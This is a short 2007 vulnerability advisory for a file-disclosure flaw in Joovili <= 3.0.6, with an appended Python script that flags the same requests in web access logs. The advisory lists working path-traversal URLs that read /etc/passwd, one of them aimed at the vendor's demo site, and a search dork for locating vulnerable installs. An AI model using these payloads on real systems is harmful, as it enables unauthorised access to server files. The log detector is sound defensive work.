# Title : Joovili <= 3.0.6 (joovili.images.php) Remote File Disclosure Vulnerability
# Published : 2007-12-27
# Author : EcHoLL
found by EcHoLL
version: 2.***
include/images.inc.php?picture=../../../../../../../../etc/passwd&thumbnail=FALSE
include/images.inc.php?picture=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&thumbnail=FALSE
version 3.**
joovili.images.php?picture=../../../../../../../..///etc/passwd&thumbnail=FALSE
joovili.images.php?picture=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&thumbnail=FALSE
demo
http://demo.joovili.com/include/joovili.images.php?picture=../../../../../../../..///etc/passwd&thumbnail=FALSE
dork: powered by joovili
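
Added example (not part of the original advisory and not Joovili's code): a log check for the requests shown above, flagging picture= values sent to joovili.images.php or include/images.inc.php that contain a parent-directory segment, including the doubled-slash form. The access-log format, client addresses and sample lines are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Script names come from the advisory; the log format and sample lines are constructed.
SCRIPTS = {"joovili.images.php", "images.inc.php"}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

SAMPLE_LOG = [
    '192.0.2.10 - - [27/Dec/2007:10:01:02 +0000] "GET /include/joovili.images.php?picture=avatar_17.jpg&thumbnail=TRUE HTTP/1.1" 200 5120',
    '198.51.100.7 - - [27/Dec/2007:10:03:44 +0000] "GET /include/joovili.images.php?picture=../../../../../../../..///etc/passwd&thumbnail=FALSE HTTP/1.1" 200 1873',
    '198.51.100.7 - - [27/Dec/2007:10:03:51 +0000] "GET /include/images.inc.php?picture=../..//../..//../..//etc/passwd&thumbnail=FALSE HTTP/1.1" 404 210',
    '192.0.2.22 - - [27/Dec/2007:10:05:10 +0000] "GET /include/joovili.images.php?picture=holiday..2007.jpg&thumbnail=TRUE HTTP/1.1" 200 8042',
]

def picture_values(target):
    """Decoded picture= values when the request targets one of the image scripts."""
    parts = urlsplit(target)
    if parts.path.rsplit("/", 1)[-1] not in SCRIPTS:
        return []
    return parse_qs(parts.query, keep_blank_values=True).get("picture", [])

def is_traversal(value):
    """True if the value could resolve outside the image directory."""
    for _ in range(3):  # parse_qs decoded once; undo nested percent-encoding
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    # Split on runs of / or \ so doubled slashes ("..//") cannot hide a ".." segment.
    segments = [s for s in re.split(r"[\\/]+", value) if s]
    return ".." in segments or value.startswith(("/", "\\")) or "\x00" in value

def scan(lines):
    """Return (line number, client address, offending value) for each suspicious request."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        bad = [v for v in picture_values(match.group(1)) if is_traversal(v)]
        if bad:
            hits.append((number, line.split()[0], bad[0]))
    return hits

if __name__ == "__main__":
    for number, client, value in scan(SAMPLE_LOG):
        print(f"line {number}: {client} requested picture={value!r}")
```

A file name that merely contains two dots, such as the last sample line, is not flagged because the check works on whole path segments. A 200 response with an unusual size on a flagged line is the one to triage first.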
# www.Syue.com [2007-12-27]